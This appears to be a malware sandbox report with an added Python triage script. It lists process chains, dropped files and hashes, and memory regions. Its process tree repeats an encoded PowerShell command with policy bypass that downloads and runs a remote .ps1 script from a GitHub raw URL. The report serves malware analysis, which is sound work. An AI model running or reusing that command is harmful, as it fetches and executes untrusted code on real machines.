  command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\system32\cmd.exe
      command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
          signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS
Downloads
-
C:\Users\Admin\AppData\Local\Temp\363.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
- C:\Users\Admin\AppData\Local\Temp\AC88.exe
  MD5: f80418f12c03a56ac2e8d8b189c13750
  SHA1: cd0b728375e4e178b50bca8ad65ce79aede30d37
  SHA256: cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
  SHA512: e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
- C:\Users\Admin\AppData\Local\Temp\RES2300.tmp
  MD5: 1044d6aff3883467f9fa20ec9258ea39
  SHA1: bf248a14d4e3f03a1414a5c6bebf95fe30be5422
  SHA256: 60b4db567fb636c27d4d3f1e3812680592b0e52b6b77cc7485c2315babb7ae88
  SHA512: e5ad96d9026bd522547f297784f84fc8253d588f65994a2698e857a5794738a6157fa92001db3cd0baf873aa313407370b63adf5d951f1168849946b56f5f560
- C:\Users\Admin\AppData\Local\Temp\RES29F5.tmp
  MD5: dc5c8a847902cf51cf7c0338057df296
  SHA1: c4c7cbf2b78942c397b4dbb73f6b621623aab59f
  SHA256: 3fe1c5568df77184c274cae30893f5662b70a0ed89d104b382bf3e625146f808
  SHA512: b7f18975a5e73da50b1c9682f819f8848de8f03ebd7f6ae5d06d296f191a0b0345ec09338b1b26641bbf364e54cf9f2acd0309a1ddeb8023df4f997bdfb8c0ca
- C:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.dll
  MD5: 9c1fe44fe8f7d7e41e79262e13689618
  SHA1: 62273f50e98b464accef349aaef2e3482c0365df
  SHA256: b3b9dcdbf0a50c1029f579175ea5492793975d3e467dac2171d9450be037965d
  SHA512: 799d52edec0a822fb82a8238068c1fc0dd77857e513f186ed366a6b95bf51c1eab7c4f361c8a092c0682e4c705ef486f9f2dcbb576738a2cb36922ca5af62131
- C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5: 854b2dfc0a28f2959b1d2fc363a4e318
  SHA1: ce1753052c5bdad56708ec75d8085b2c597df6c1
  SHA256: 7135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
  SHA512: b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
- C:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.dll
  MD5: fcf1647bc0acd65067d249490174b9d4
  SHA1: 6daa06b067dfa37a6f8d1d0ac64a618fb047443f
  SHA256: 63be7fe7eec030db0f0fb27ded0a417b21d363d8ca094338bf3f252989de1969
  SHA512: 779dcd03d743295481266f26507adb7375c5f2f4e219ba08cc9e747bdb95d5215ed54eca6bee570211959cae652feebe14655902eac38f972a1227cd47a5522b
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 28d9755addec05c0b24cca50dfe3a92b
  SHA1: 7d3156f11c7a7fb60d29809caf93101de2681aa3
  SHA256: abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
  SHA512: 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
- C:\Users\Admin\AppData\Roaming\uuterhr
  MD5: 5abf77ca17cd967de8dc06a7c3e6ada3
  SHA1: 354620233a6e3818e3d4f727955dfbf1d3f91e3e
  SHA256: b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680
  SHA512: 2b17bc802ff794a6044fc6347c36ce110afc89b8c92ab60cddb2b5593d885868a826ff4b3c413b006539383f673eeb133187ee87ff37f5b5087909f75c748395
- \??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\CSCE6E96CA1A4FA4D84B5DBF5FBB9662E26.TMP
  MD5: f9818963980f81a3eaf9791a2dbdd6fb
  SHA1: 0e984cbede0a576a6ca018526ff331f1959c3ac5
  SHA256: 9b4ee2f1b1200b19ea330db7930bed17be62cd69ecd9596140386c32515478b4
  SHA512: 23ce050340b845b67fe7b3189e9821d9e4dcbc9027f7011511c117dfda04381cbe9a2dd06143068707a6d7f1556cca4387c39eb7319a3f2d9d37ff7551eb9102
- \??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.0.cs
  MD5: e0f116150ceec4ea8bb954d973e3b649
  SHA1: 86a8e81c70f4cc265f13e8760cf8888a6996f0fd
  SHA256: 511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
  SHA512: 32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
- \??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.cmdline
  MD5: 2b77ca25bfbb47e83454ec7caf774ad8
  SHA1: a386d83caa93da2409b25ecff159de1d9e313b84
  SHA256: 2fca58af6748d6e488ef52e8c5835c83061408324d26a01f428bfa7268de04c9
  SHA512: 6cb9dd95b2e2c8ffe833b8d9320ab4d07bea658089c3c61c4fceb0fa6cdb568d59baf4b9a587788d68b9a256d54f84dbfcad449478f9388cf88ac1086bd684be
- \??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\CSC8653EED5F314474E83368F1494FA423E.TMP
  MD5: bc4eb80e9500b3bd61e9c6a8f183ead4
  SHA1: a4cbe6140c033c9fc2354d2bab3e1717f774f462
  SHA256: 1fea231689d34674633bc390afb64e2ce01228f3d8b4895afec4e83d9451817e
  SHA512: 4bf9c6341627c6467eab7ff96cd15d758fbf9c5e430069853b71f2d8e288f3769989d20bddc1a34f3ab9d004826472b86154975e74a6faddb72ad7bd558aa59f
- \??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.0.cs
  MD5: 9f8ab7eb0ab21443a2fe06dab341510e
  SHA1: 2b88b3116a79e48bab7114e18c9b9674e8a52165
  SHA256: e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
  SHA512: 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
- \??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.cmdline
  MD5: aad209322b8583200fbb28eeb3eecf84
  SHA1: 5cdce6243042dfc4c1dfc719c86a5206f27f361b
  SHA256: 3591900c29b0ddd1b7f56127ecf4ced1609277246895c6d29802c3bc1f7c3a2c
  SHA512: c37719ffd7e665de70e514572bf32e8a70e8ec92f09746ed463cb0d18e401779045b61322036e15be8489b83527b95427d606cba2655eb95b5222b86f514b0e1
- \Windows\Branding\mediasrv.png
  MD5: 83bd2c45f1faf20a77579cbb8765c2b3
  SHA1: fe01b295c1005f4cbc0cfcb277dac5e7c443622c
  SHA256: ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
  SHA512: e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
- \Windows\Branding\mediasvc.png
  MD5: af4e893deae35128088534aea49a1b74
  SHA1: ce25e8e738978a2106e3464a7a4bf0345e60fd31
  SHA256: 76dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
  SHA512: 3115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
- memory/364-407-0x0000000000000000-mapping.dmp
- memory/504-341-0x0000000000000000-mapping.dmp
- memory/652-389-0x0000000000000000-mapping.dmp
- memory/688-316-0x00000240F4F58000-0x00000240F4F5A000-memory.dmp (Filesize 8KB)
- memory/688-237-0x0000000000000000-mapping.dmp
- memory/688-272-0x00000240F4F50000-0x00000240F4F52000-memory.dmp (Filesize 8KB)
- memory/688-275-0x00000240F4F56000-0x00000240F4F58000-memory.dmp (Filesize 8KB)
- memory/688-273-0x00000240F4F53000-0x00000240F4F55000-memory.dmp (Filesize 8KB)
- memory/700-403-0x0000000000000000-mapping.dmp
- memory/764-384-0x0000000000000000-mapping.dmp
- memory/844-203-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-192-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-190-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-191-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-194-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-189-0x0000000000000000-mapping.dmp
- memory/844-195-0x0000026E002D3000-0x0000026E002D5000-memory.dmp (Filesize 8KB)
- memory/844-193-0x0000026E002D0000-0x0000026E002D2000-memory.dmp (Filesize 8KB)
- memory/844-196-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-198-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-199-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-201-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-202-0x0000026E002A0000-0x0000026E002A2000-memory.dmp (Filesize 8KB)
- memory/844-223-0x0000026E002D6000-0x0000026E002D8000-memory.dmp (Filesize 8KB)
- memory/844-270-0x0000026E002D8000-0x0000026E002DA000-memory.dmp (Filesize 8KB)
- memory/876-381-0x0000000000000000-mapping.dmp
- memory/952-146-0x0000015111F30000-0x0000015111F32000-memory.dmp (Filesize 8KB)
- memory/952-144-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-137-0x0000000000000000-mapping.dmp
- memory/952-164-0x000001512ABB0000-0x000001512ABB1000-memory.dmp (Filesize 4KB)
- memory/952-139-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-138-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-173-0x000001512ABF0000-0x000001512ABF1000-memory.dmp (Filesize 4KB)
- memory/952-176-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-177-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-179-0x0000015111F38000-0x0000015111F39000-memory.dmp (Filesize 4KB)
- memory/952-180-0x000001512B270000-0x000001512B271000-memory.dmp (Filesize 4KB)
- memory/952-181-0x000001512B600000-0x000001512B601000-memory.dmp (Filesize 4KB)
- memory/952-188-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-156-0x0000015111F36000-0x0000015111F38000-memory.dmp (Filesize 8KB)
- memory/952-149-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-148-0x000001512AC30000-0x000001512AC31000-memory.dmp (Filesize 4KB)
- memory/952-147-0x0000015111F33000-0x0000015111F35000-memory.dmp (Filesize 8KB)
- memory/952-140-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-145-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-141-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/952-143-0x0000015111F40000-0x0000015111F41000-memory.dmp (Filesize 4KB)
- memory/952-142-0x0000015111A70000-0x0000015111A72000-memory.dmp (Filesize 8KB)
- memory/1012-124-0x0000000000000000-mapping.dmp
- memory/1012-127-0x0000000000B00000-0x0000000000B45000-memory.dmp (Filesize 276KB)
- memory/1088-122-0x0000000000400000-0x00000000004CC000-memory.dmp (Filesize 816KB)
- memory/1088-121-0x00000000006F1000-0x0000000000702000-memory.dmp (Filesize 68KB)
- memory/1372-495-0x0000000000000000-mapping.dmp
- memory/1392-397-0x0000000000000000-mapping.dmp
- memory/1432-387-0x0000000000000000-mapping.dmp
- memory/1444-136-0x000001C1CE476000-0x000001C1CE477000-memory.dmp (Filesize 4KB)
- memory/1444-135-0x000001C1CE475000-0x000001C1CE476000-memory.dmp (Filesize 4KB)
- memory/1444-133-0x000001C1CE470000-0x000001C1CE472000-memory.dmp (Filesize 8KB)
- memory/1444-134-0x000001C1CE473000-0x000001C1CE475000-memory.dmp (Filesize 8KB)
- memory/1444-131-0x000001C1CE760000-0x000001C1CEA2F000-memory.dmp (Filesize 2.8MB)
- memory/1444-128-0x0000000000000000-mapping.dmp
- memory/1452-386-0x0000000000000000-mapping.dmp
- memory/1480-405-0x0000000000000000-mapping.dmp
- memory/1592-402-0x0000000000000000-mapping.dmp
- memory/2004-157-0x0000000000000000-mapping.dmp
- memory/2068-321-0x000001F471E56000-0x000001F471E58000-memory.dmp (Filesize 8KB)
- memory/2068-281-0x0000000000000000-mapping.dmp
- memory/2068-317-0x000001F471E50000-0x000001F471E52000-memory.dmp (Filesize 8KB)
- memory/2068-319-0x000001F471E53000-0x000001F471E55000-memory.dmp (Filesize 8KB)
- memory/2068-332-0x000001F471E58000-0x000001F471E5A000-memory.dmp (Filesize 8KB)
- memory/2280-401-0x0000000000000000-mapping.dmp
- memory/2324-404-0x0000000000000000-mapping.dmp
- memory/2372-391-0x0000000000000000-mapping.dmp
- memory/2420-123-0x0000000002BB0000-0x0000000002BC6000-memory.dmp (Filesize 88KB)
- memory/2420-118-0x0000000000D20000-0x0000000000D36000-memory.dmp (Filesize 88KB)
- memory/2552-115-0x0000000000731000-0x0000000000741000-memory.dmp (Filesize 64KB)
- memory/2552-116-0x0000000000030000-0x0000000000039000-memory.dmp (Filesize 36KB)
- memory/2552-117-0x0000000000400000-0x00000000004CC000-memory.dmp (Filesize 816KB)
- memory/2740-398-0x0000000000000000-mapping.dmp
- memory/2792-394-0x0000000000000000-mapping.dmp
- memory/2812-169-0x0000000000000000-mapping.dmp
- memory/2924-385-0x0000000000000000-mapping.dmp
- memory/3000-406-0x0000000000000000-mapping.dmp
- memory/3000-343-0x0000000000000000-mapping.dmp
- memory/3056-166-0x0000000000000000-mapping.dmp
- memory/3292-399-0x0000000000000000-mapping.dmp
- memory/3344-160-0x0000000000000000-mapping.dmp
- memory/3480-390-0x0000000000000000-mapping.dmp
- memory/3544-395-0x0000000000000000-mapping.dmp
- memory/3668-380-0x0000000000000000-mapping.dmp
- memory/3672-388-0x0000000000000000-mapping.dmp
- memory/3696-423-0x000001EEA9DE0000-0x000001EEA9DE2000-memory.dmp (Filesize 8KB)
- memory/3696-409-0x0000000000000000-mapping.dmp
- memory/3696-424-0x000001EEA9DE3000-0x000001EEA9DE5000-memory.dmp (Filesize 8KB)
- memory/3696-427-0x000001EEA9DE6000-0x000001EEA9DE8000-memory.dmp (Filesize 8KB)
- memory/3696-478-0x000001EEA9DE8000-0x000001EEA9DE9000-memory.dmp (Filesize 4KB)
- memory/3748-396-0x0000000000000000-mapping.dmp
- memory/3792-408-0x0000000000000000-mapping.dmp
- memory/3856-494-0x0000000000000000-mapping.dmp
- memory/3956-342-0x0000000000000000-mapping.dmp
- memory/3996-400-0x0000000000000000-mapping.dmp
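The dropped-file list above mixes several distinct kinds of artefact: a copy of the submitted sample under %AppData%\Roaming with no extension, PowerShell scripts and executables in %TEMP%, the `<8 chars>\<8 chars>.0.cs`, `.cmdline`, `.dll`, `CSC<guid>.TMP` and `RES<hex>.tmp` set that csc.exe leaves behind when PowerShell compiles C# at runtime (Add-Type or CodeDom), and two files with .png names written under \Windows\Branding. The following added example, not part of the sandbox report, reads those entries, drops the duplicated rows, and tags each path with these heuristics. The paths and SHA-256 values are copied from the list above and the sample hash from the report header; the tag names, regexes and function names are this example's own.

```python
"""Triage the dropped-file entries of a sandbox report.

Added example, not part of the report. DROPPED and SAMPLE_SHA256 are copied
from the report; the heuristics and tag names are this example's own.
"""
from __future__ import annotations

import ntpath
import re

SAMPLE_SHA256 = "b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680"

# (path, sha256) as listed in the report, including the rows it lists twice.
DROPPED = [
    (r"C:\Users\Admin\AppData\Local\Temp\363.exe", "6a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b"),
    (r"C:\Users\Admin\AppData\Local\Temp\363.exe", "6a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b"),
    (r"C:\Users\Admin\AppData\Local\Temp\AC88.exe", "cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716"),
    (r"C:\Users\Admin\AppData\Local\Temp\AC88.exe", "cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716"),
    (r"C:\Users\Admin\AppData\Local\Temp\RES2300.tmp", "60b4db567fb636c27d4d3f1e3812680592b0e52b6b77cc7485c2315babb7ae88"),
    (r"C:\Users\Admin\AppData\Local\Temp\RES29F5.tmp", "3fe1c5568df77184c274cae30893f5662b70a0ed89d104b382bf3e625146f808"),
    (r"C:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.dll", "b3b9dcdbf0a50c1029f579175ea5492793975d3e467dac2171d9450be037965d"),
    (r"C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1", "7135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c"),
    (r"C:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.dll", "63be7fe7eec030db0f0fb27ded0a417b21d363d8ca094338bf3f252989de1969"),
    (r"C:\Users\Admin\AppData\Local\Temp\ready.ps1", "abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9"),
    (r"C:\Users\Admin\AppData\Roaming\uuterhr", "b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680"),
    (r"C:\Users\Admin\AppData\Roaming\uuterhr", "b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\CSCE6E96CA1A4FA4D84B5DBF5FBB9662E26.TMP", "9b4ee2f1b1200b19ea330db7930bed17be62cd69ecd9596140386c32515478b4"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.0.cs", "511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.cmdline", "2fca58af6748d6e488ef52e8c5835c83061408324d26a01f428bfa7268de04c9"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\CSC8653EED5F314474E83368F1494FA423E.TMP", "1fea231689d34674633bc390afb64e2ce01228f3d8b4895afec4e83d9451817e"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.0.cs", "e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9"),
    (r"\??\c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.cmdline", "3591900c29b0ddd1b7f56127ecf4ced1609277246895c6d29802c3bc1f7c3a2c"),
    (r"\Windows\Branding\mediasrv.png", "ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809"),
    (r"\Windows\Branding\mediasvc.png", "76dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d"),
]

# PowerShell Add-Type / CodeDom compiles into %TEMP%\<8 random chars>\<same>.0.cs,
# <same>.cmdline, <same>.dll and CSC<guid>.TMP, with RES<hex>.tmp next to them.
ADD_TYPE_DIR = re.compile(r"\\temp\\([a-z0-9]{8})\\(?:\1\.(?:dll|0\.cs|cmdline)|csc[0-9a-f]{32}\.tmp)$")
RES_TMP = re.compile(r"\\temp\\res[0-9a-f]+\.tmp$")
SCRIPT_EXT = {".ps1", ".vbs", ".js", ".bat", ".cmd"}
BINARY_EXT = {".exe", ".dll", ".scr"}


def normalize(path: str) -> str:
    """Drop the NT object-manager prefix (\\??\\) and lowercase for comparison."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def classify(path: str, sha256: str) -> set[str]:
    """Tag one dropped file with the triage heuristics defined above."""
    p = normalize(path)
    ext = ntpath.splitext(p)[1]
    tags: set[str] = set()
    if sha256.lower() == SAMPLE_SHA256:
        tags.add("copy_of_sample")            # the sample re-wrote itself elsewhere
    if ADD_TYPE_DIR.search(p) or RES_TMP.search(p):
        tags.add("runtime_compile_artifact")  # csc.exe output from PowerShell Add-Type
    if "\\temp\\" in p and ext in SCRIPT_EXT:
        tags.add("script_in_temp")
    if "\\temp\\" in p and ext in BINARY_EXT and "runtime_compile_artifact" not in tags:
        tags.add("binary_in_temp")
    if "\\appdata\\roaming\\" in p and ext == "":
        tags.add("persistence_candidate")     # extensionless file in the roaming profile
    if "\\windows\\" in p and ext not in SCRIPT_EXT | BINARY_EXT:
        tags.add("write_to_system_dir")       # non-executable name under \Windows: check its magic
    return tags


def triage(entries) -> dict[str, set[str]]:
    """Deduplicate the report's rows and return normalized path -> tags."""
    seen: dict[str, set[str]] = {}
    for path, sha256 in entries:
        key = normalize(path)
        if key not in seen:
            seen[key] = classify(path, sha256)
    return seen


def runtime_compile_dirs(entries) -> set[str]:
    """Distinct Add-Type working directories, i.e. how many separate compiles ran."""
    dirs: set[str] = set()
    for path, _ in entries:
        m = ADD_TYPE_DIR.search(normalize(path))
        if m:
            dirs.add(m.group(1))
    return dirs


if __name__ == "__main__":
    for p, tags in triage(DROPPED).items():
        print(f"{p}: {', '.join(sorted(tags)) or '-'}")
    print("Add-Type compile dirs:", sorted(runtime_compile_dirs(DROPPED)))
```

Two things fall out of the tags that the raw list does not show at a glance: the two `.0.cs`/`.cmdline`/`CSC*.TMP` groups mean PowerShell compiled C# twice in this run (two separate Add-Type invocations, one per random directory), and the \Windows\Branding\*.png entries are the only files written outside the user profile, so their contents, not their names, should decide whether they are images.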